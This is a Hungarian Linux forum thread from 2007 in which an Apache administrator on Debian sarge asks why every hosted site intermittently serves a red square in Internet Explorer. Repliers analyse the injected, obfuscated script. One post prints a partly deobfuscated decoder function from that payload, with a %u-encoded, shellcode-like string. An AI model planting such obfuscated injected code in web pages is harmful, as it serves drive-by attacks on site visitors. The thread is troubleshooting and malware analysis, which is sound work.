sarge(amd64) apache erdekes jelenseg

Debian GNU/Linux

Minden oldal szepen es jol futott megnem a napokban elojott egy olyan jelenseg hogy IE alatt az oldalak helyett egy piros negyzet jelent meg a bal felso sarokban, FF alatt pedig szimplan egy ures feher lap aztan apache restart utan megoldodott csak nem talalom az okot error logban semmi nincs rola es elojott megint a jelenseg:(

apache2+php4 fut mind2 csomagbol debian sarge amd64

piros negyzet http://kepfeltoltes.hu/view/070316/ezmi_www.kepfeltoltes.hu_.jpg
forrasa pedig egy atlathatatlan visual basic kod, ami
mindig valtozik: http://rafb.net/p/zVG6iK38.html

  • 1045 megtekintés

FF nem értelmezi a VBS-t (szerencsére). Lehet ez egy polimorf féreg is... ebben az esetben nem biztos, hogy megtalálod find-dal. Vagy lehet akár egy js-ben is, kívülről belinkelve. Próbáld beazonosítani az oldalt, amire ez előjön, nézd meg a forrását (a szerveren, ne a böngészőben!), mod_security-t kapcsold be, audit logot sasold... Esetleg a bibs oldal számunkra nem elérhető? Megnézném, mit produkál az én böngészőmben.
--
Coding for fun. ;)

Az a durva, hogy a szerveren található 20-30 domain minden oldala egyszerre előadja ilyenkor ezt. Apache restart után eltűnne a féreg és vissza is jönne idővel? Több oldal is bibis, és van hogy nem mindenkinél, illetve néhány frissítés után megjavul.. A logok szerint pedig nem történik semmi.

( szotsaki | 2007. 03. 16., p – 15:22 )

A script vb része (mire beindult az ie... :))
http://img134.imagevenue.com/img.php?image=54215_iegomb_122_501lo.jpg

(Elnézést, de szöveget másolni nem tudok wine-ból)

A visszatérési karakterkódok Unicode kódolás esetén:
U313D: HANGUL LETTER RIEUL-SIOS
U3030: WAVY DASH
U2632: TRIGRAM FOR FIRE
U3D69: many; flourishing; uxuriant growth (of vegetation)
U2669: QUARTER NOTE
U3D74: to sink
U3832: ripped; split
Az %ucccc-t nem tudom, mi lehet.

Itt a fenti kép nem annyira obfuszkált változata: 


function tvct (){
	return "%u313d%u3030%u2632%u3d69%u2639%u3d74%u3832%ucccc";
}
function kkucu(om){
	var vdu, m = "aU)479fyP57qdb-uErt8eH_glc0hijT'zFv=]:k`Gm;2V@noIA~!wsB61pM\"[x(J^*+KN#{|3}$&O:C";
	var sh = '';
	var nmt, uj, I = '';
	var gq;
	
	for (vdu = 0; vdu < om.length; vdu++) {
		nmt = om.charAt(vdu);
		uj = m.indexOf(nmt);
		if (uj > -1){
			gq = ((uj+1) % 81 -1);
			if (gq <= 0){
				gq += 81
			}
			I +=m.charAt(gq-1)
		} else {
			I += nmt;
		}
	sh += I;
	}
	document.write(sh);
}

De ez még mindig csak a VBScriptes része a fájlnak
Az "m" változó értékét kéne megfejteni

( szotsaki | 2007. 03. 16., p – 16:00 )

Nos, ez érdekes.

Nálam wine-nal nem jön be amit szeretnék, mivel csak egy fehér ablak jelenik meg helyette.

Megtennéd, hogy kiteszel ide egy képet a következőről:

A script végén találsz egy ilyet:
kkucu(f);
Ezt írd át erre, majd jelentsd meg az egész lapot ie-ben: alert(kkucu(f));

Az alert ablak képét szeretném csak megtekinteni.

Egyébként érdekes, hogy IE7-tel (legalábbis alapbeállításokkal) mintha nem működne a kód.

( szotsaki | 2007. 03. 16., p – 16:15 )

Úgy néz ki, hogy a VML rajzolja ki a piros négyzetet.

Póbáld ki ezt egy üres lapon, IE6-ban: 


<HTML xmlns:v="urn:schemas-microsoft-com:vml">
<body>
<style>
v\:* {behavior:url(#default#VML);}
</style>
<v:rect style="width:50pt;height:50pt" fillcolor="red"></v:rect>
</body>
</html>

Ez persze nem a fenti kódból való, csak úgy vélem, valami ilyennel operálhat a script is.
Nálam ez is üres, fehér ablakot jelenít meg.
Lehet, hogy a <style> tagot át kéne rakni a <head> részbe.